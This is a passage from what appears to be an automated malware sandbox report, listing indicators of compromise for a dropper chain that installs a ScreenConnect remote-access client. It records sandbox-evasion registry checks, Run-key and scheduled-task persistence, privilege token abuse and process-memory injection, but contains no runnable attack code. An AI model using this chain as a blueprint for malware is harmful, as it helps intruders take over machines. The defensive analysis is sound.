Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	download.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3b39d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBUN8fn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	67e0HNq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dyshh8M.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2v5527.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000622eb924184734490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000622eb9240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900622eb924000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d622eb924000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000622eb92400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
135020	Process not Found

Kills process with taskkill 5 IoCs

pid	Process
194248	Process not Found
193832	Process not Found
187908	Process not Found
193388	Process not Found
193792	Process not Found

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe

Modifies registry class 38 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
129624	Process not Found
141840	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2292	2v5527.exe
2292	2v5527.exe
2292	2v5527.exe
2292	2v5527.exe
2292	2v5527.exe
2292	2v5527.exe
4680	3b39d.exe
4680	3b39d.exe
1764	6NPpGdC.exe
1764	6NPpGdC.exe
1764	6NPpGdC.exe
1764	6NPpGdC.exe
4088	VBUN8fn.exe
4088	VBUN8fn.exe
4088	VBUN8fn.exe
4088	VBUN8fn.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
524	msiexec.exe
524	msiexec.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3088	ScreenConnect.ClientService.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
3340	xqWgymz.exe
30656	Process not Found
30656	Process not Found
129624	Process not Found
129624	Process not Found
129624	Process not Found
138956	Process not Found
138956	Process not Found
138956	Process not Found
140112	Process not Found
140112	Process not Found
140112	Process not Found
140968	Process not Found
140968	Process not Found
140968	Process not Found
142248	Process not Found
142248	Process not Found
142248	Process not Found
144556	Process not Found
144556	Process not Found
145836	Process not Found
145836	Process not Found
110836	Process not Found
110836	Process not Found
110836	Process not Found
110836	Process not Found
160076	Process not Found
160076	Process not Found
166548	Process not Found
166548	Process not Found
166548	Process not Found
166548	Process not Found
166548	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4476	67e0HNq.exe
Token: SeShutdownPrivilege	2392	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2392	msiexec.exe
Token: SeSecurityPrivilege	524	msiexec.exe
Token: SeCreateTokenPrivilege	2392	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2392	msiexec.exe
Token: SeLockMemoryPrivilege	2392	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2392	msiexec.exe
Token: SeMachineAccountPrivilege	2392	msiexec.exe
Token: SeTcbPrivilege	2392	msiexec.exe
Token: SeSecurityPrivilege	2392	msiexec.exe
Token: SeTakeOwnershipPrivilege	2392	msiexec.exe
Token: SeLoadDriverPrivilege	2392	msiexec.exe
Token: SeSystemProfilePrivilege	2392	msiexec.exe
Token: SeSystemtimePrivilege	2392	msiexec.exe
Token: SeProfSingleProcessPrivilege	2392	msiexec.exe
Token: SeIncBasePriorityPrivilege	2392	msiexec.exe
Token: SeCreatePagefilePrivilege	2392	msiexec.exe
Token: SeCreatePermanentPrivilege	2392	msiexec.exe
Token: SeBackupPrivilege	2392	msiexec.exe
Token: SeRestorePrivilege	2392	msiexec.exe
Token: SeShutdownPrivilege	2392	msiexec.exe
Token: SeDebugPrivilege	2392	msiexec.exe
Token: SeAuditPrivilege	2392	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2392	msiexec.exe
Token: SeChangeNotifyPrivilege	2392	msiexec.exe
Token: SeRemoteShutdownPrivilege	2392	msiexec.exe
Token: SeUndockPrivilege	2392	msiexec.exe
Token: SeSyncAgentPrivilege	2392	msiexec.exe
Token: SeEnableDelegationPrivilege	2392	msiexec.exe
Token: SeManageVolumePrivilege	2392	msiexec.exe
Token: SeImpersonatePrivilege	2392	msiexec.exe
Token: SeCreateGlobalPrivilege	2392	msiexec.exe
Token: SeCreateTokenPrivilege	2392	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2392	msiexec.exe
Token: SeLockMemoryPrivilege	2392	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2392	msiexec.exe
Token: SeMachineAccountPrivilege	2392	msiexec.exe
Token: SeTcbPrivilege	2392	msiexec.exe
Token: SeSecurityPrivilege	2392	msiexec.exe
Token: SeTakeOwnershipPrivilege	2392	msiexec.exe
Token: SeLoadDriverPrivilege	2392	msiexec.exe
Token: SeSystemProfilePrivilege	2392	msiexec.exe
Token: SeSystemtimePrivilege	2392	msiexec.exe
Token: SeProfSingleProcessPrivilege	2392	msiexec.exe
Token: SeIncBasePriorityPrivilege	2392	msiexec.exe
Token: SeCreatePagefilePrivilege	2392	msiexec.exe
Token: SeCreatePermanentPrivilege	2392	msiexec.exe
Token: SeBackupPrivilege	2392	msiexec.exe
Token: SeRestorePrivilege	2392	msiexec.exe
Token: SeShutdownPrivilege	2392	msiexec.exe
Token: SeDebugPrivilege	2392	msiexec.exe
Token: SeAuditPrivilege	2392	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2392	msiexec.exe
Token: SeChangeNotifyPrivilege	2392	msiexec.exe
Token: SeRemoteShutdownPrivilege	2392	msiexec.exe
Token: SeUndockPrivilege	2392	msiexec.exe
Token: SeSyncAgentPrivilege	2392	msiexec.exe
Token: SeEnableDelegationPrivilege	2392	msiexec.exe
Token: SeManageVolumePrivilege	2392	msiexec.exe
Token: SeImpersonatePrivilege	2392	msiexec.exe
Token: SeCreateGlobalPrivilege	2392	msiexec.exe
Token: SeCreateTokenPrivilege	2392	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2392	msiexec.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2392	msiexec.exe
2392	msiexec.exe
129144	Process not Found
129144	Process not Found
129144	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
129144	Process not Found
129144	Process not Found
129144	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
195076	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found
187292	Process not Found

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
195076	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 3516	4320	download.exe	88
PID 4320 wrote to memory of 3516	4320	download.exe	88
PID 4320 wrote to memory of 3516	4320	download.exe	88
PID 3516 wrote to memory of 5064	3516	P0p33.exe	89
PID 3516 wrote to memory of 5064	3516	P0p33.exe	89
PID 3516 wrote to memory of 5064	3516	P0p33.exe	89
PID 5064 wrote to memory of 3228	5064	1W41I9.exe	93
PID 5064 wrote to memory of 3228	5064	1W41I9.exe	93
PID 5064 wrote to memory of 3228	5064	1W41I9.exe	93
PID 3516 wrote to memory of 2292	3516	P0p33.exe	94
PID 3516 wrote to memory of 2292	3516	P0p33.exe	94
PID 3516 wrote to memory of 2292	3516	P0p33.exe	94
PID 4320 wrote to memory of 4680	4320	download.exe	99
PID 4320 wrote to memory of 4680	4320	download.exe	99
PID 4320 wrote to memory of 4680	4320	download.exe	99
PID 3228 wrote to memory of 5052	3228	rapes.exe	101
PID 3228 wrote to memory of 5052	3228	rapes.exe	101
PID 3228 wrote to memory of 5052	3228	rapes.exe	101
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 5052 wrote to memory of 1764	5052	6NPpGdC.exe	102
PID 3228 wrote to memory of 4088	3228	rapes.exe	108
PID 3228 wrote to memory of 4088	3228	rapes.exe	108
PID 3228 wrote to memory of 4088	3228	rapes.exe	108
PID 3228 wrote to memory of 4476	3228	rapes.exe	110
PID 3228 wrote to memory of 4476	3228	rapes.exe	110
PID 3228 wrote to memory of 4476	3228	rapes.exe	110
PID 4476 wrote to memory of 2392	4476	67e0HNq.exe	111
PID 4476 wrote to memory of 2392	4476	67e0HNq.exe	111
PID 4476 wrote to memory of 2392	4476	67e0HNq.exe	111
PID 524 wrote to memory of 3768	524	msiexec.exe	114
PID 524 wrote to memory of 3768	524	msiexec.exe	114
PID 524 wrote to memory of 3768	524	msiexec.exe	114
PID 3768 wrote to memory of 4064	3768	MsiExec.exe	115
PID 3768 wrote to memory of 4064	3768	MsiExec.exe	115
PID 3768 wrote to memory of 4064	3768	MsiExec.exe	115
PID 3228 wrote to memory of 3340	3228	rapes.exe	121
PID 3228 wrote to memory of 3340	3228	rapes.exe	121
PID 524 wrote to memory of 3096	524	msiexec.exe	124
PID 524 wrote to memory of 3096	524	msiexec.exe	124
PID 524 wrote to memory of 4400	524	msiexec.exe	126
PID 524 wrote to memory of 4400	524	msiexec.exe	126
PID 524 wrote to memory of 4400	524	msiexec.exe	126
PID 524 wrote to memory of 32	524	msiexec.exe	127
PID 524 wrote to memory of 32	524	msiexec.exe	127
PID 524 wrote to memory of 32	524	msiexec.exe	127
PID 3088 wrote to memory of 992	3088	ScreenConnect.ClientService.exe	129
PID 3088 wrote to memory of 992	3088	ScreenConnect.ClientService.exe	129
PID 3088 wrote to memory of 3040	3088	ScreenConnect.ClientService.exe	130
PID 3088 wrote to memory of 3040	3088	ScreenConnect.ClientService.exe	130
PID 3228 wrote to memory of 3920	3228	rapes.exe	131
PID 3228 wrote to memory of 3920	3228	rapes.exe	131
PID 3228 wrote to memory of 3920	3228	rapes.exe	131
PID 3920 wrote to memory of 1232	3920	Dyshh8M.exe	132
PID 3920 wrote to memory of 1232	3920	Dyshh8M.exe	132
PID 3920 wrote to memory of 1232	3920	Dyshh8M.exe	132
PID 3920 wrote to memory of 4272	3920	Dyshh8M.exe	133
PID 3920 wrote to memory of 4272	3920	Dyshh8M.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5052
      - C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1764
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 960
        6⤵
        Program crash
        
        PID:1460
    - - C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
    - - C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4476
      - C:\Windows\SysWOW64\msiexec.exe
        
